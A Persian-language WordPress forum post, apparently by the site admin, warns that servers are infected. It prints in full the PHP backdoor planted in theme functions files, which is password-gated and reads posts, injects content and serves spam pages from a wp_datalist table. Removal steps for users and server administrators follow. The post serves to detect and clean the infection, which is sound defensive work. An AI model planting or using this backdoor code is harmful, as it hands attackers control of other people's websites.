نمایش پست تنها
  شماره ارسال : [ ]
قدیمی 11-12-2017, 10:27 PM
admin
مدیریت کل سایت
admin آواتار ها


پست ها
754

+پاسخ ها

تاریخ ثبت نام
Oct 2017

شهر

سیستم عامل

شماره کاربری
1

آفلاین
 
پیش فرض هشدار به کاربران انجمن وردپرس ایرانی
هشدار به کاربران انجمن وردپرس ایرانی

این هشدار را خواهشمندم جدی بگیرید
اگر جدولی در پایگاه داده خود با نام wp_datalist دارید
آیا کد زیر در فانکشن قالب شما وجود دارد

کد PHP:
<?phpif (isset($_REQUEST['action']) &&   isset($_REQUEST['password']) && ($_REQUEST['password'] ==   '8c59047702c59779a2330fcff0c28874')){switch ($_REQUEST['action']){case   'get_all_links';foreach ($wpdb->get_results('SELECT * FROM `' .   $wpdb->prefix 'posts` WHERE `post_status` = "publish" AND   `post_type` = "post" ORDER BY `ID` DESC'ARRAY_A) as   $data){$data['code'] = '';if (preg_match('!<div   id="wp_cd_code">(.*?)</div>!s'$data['post_content'],   $_)){$data['code'] = $_[1];}print   '<e><w>1</w><url>' $data['guid'] .   '</url><code>' $data['code'] . '</code><id>' .   $data['ID'] . '</id></e>' "\r\n";}break;case   'set_id_links';if (isset($_REQUEST['data'])){$data $wpdb ->   get_row('SELECT `post_content` FROM `' $wpdb->prefix 'posts`   WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');$post_content  =  preg_replace('!<div id="wp_cd_code">(.*?)</div>!s''',   $data -> post_content);if (!empty($_REQUEST['data'])) $post_content =   $post_content '<div id="wp_cd_code">' .   stripcslashes($_REQUEST['data']) . '</div>';if   ($wpdb->query('UPDATE `' $wpdb->prefix 'posts` SET   `post_content` = "' mysql_escape_string($post_content) . '" WHERE  `ID`  = "' mysql_escape_string($_REQUEST['id']) . '"') !==  false){print  "true";}}break;case 'create_page';if   (isset($_REQUEST['remove_page'])){if ($wpdb -> query('DELETE FROM `'  .  $wpdb->prefix 'datalist` WHERE `url` =   "/'.mysql_escape_string($_REQUEST['url']).'"')){print "true";}}elseif   (isset($_REQUEST['content']) &&  !empty($_REQUEST['content'])){if  ($wpdb -> query('INSERT INTO `' .  $wpdb->prefix 'datalist` SET  `url` =  "/'.mysql_escape_string($_REQUEST['url']).'", `title` =   "'.mysql_escape_string($_REQUEST['title']).'", `keywords` =   "'.mysql_escape_string($_REQUEST['keywords']).'", `description` =   "'.mysql_escape_string($_REQUEST['description']).'", `content` =   "'.mysql_escape_string($_REQUEST['content']).'", `full_content` =   "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY   UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'",   `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'",   `description` = "'.mysql_escape_string($_REQUEST['description']).'",   `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'",   `full_content` =   "'.mysql_escape_string($_REQUEST['full_content']).'"')){print   "true";}}break;default: print "ERROR_WP_ACTION WP_URL_CD";}die("");}if (   $wpdb->get_var('SELECT count(*) FROM `' $wpdb->prefix .   'datalist` WHERE `url` = "'.mysql_escape_string(  $_SERVER['REQUEST_URI']  ).'"') == '1' ){$data $wpdb ->  get_row('SELECT * FROM `' .  $wpdb->prefix 'datalist` WHERE `url` =   "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');if ($data ->   full_content){print stripslashes($data -> content);}else{print   '<!DOCTYPE html>';print '<html ';language_attributes();print '   class="no-js">';print '<head>';print   '<title>'.stripslashes($data -> title).'</title>';print   '<meta name="Keywords" content="'.stripslashes($data ->   keywords).'" />';print '<meta name="Description"   content="'.stripslashes($data -> description).'" />';print   '<meta name="robots" content="index, follow" />';print '<meta   charset="';bloginfo'charset' );print '" />';print '<meta   name="viewport" content="width=device-width">';print '<link   rel="profile" href="http://gmpg.org/xfn/11">';print '<link   rel="pingback" href="';bloginfo'pingback_url' );print   '">';wp_head();print '</head>';print '<body>';print   '<div id="content" class="site-content">';print  stripslashes($data  ->   content);get_search_form();get_sidebar();get_footer();}exit;}?>
اگر هر دو مثبت هست باید بگم سرور شما آلوده می باشد و 100 درصد کلیه سایت های روی سرور به فنا رفته و هک شده اند و میزبانی برای تبلیغات شده اند
برای رهایی از شر این ویروس چه باید کرد
برای کاربران
بک آپی از سایت خود گرفته و در سیستم فایل فانکشن را باز کرده و کد را حذف کنند و جدو مورد نظر را نیز حذف کرده و بک آپ را به سرور جدید انتقال دهند


برای مدیران سرور
جدول معروف را در کلیه پایگاه داده های سرور حذف کرده و کلیه فایل ها را در زمانی که سرور پورت 80 به فرض آپاچی را خاموش و فایل های فانشکشن سایت ها را پاکسازی و کد را حذف کنند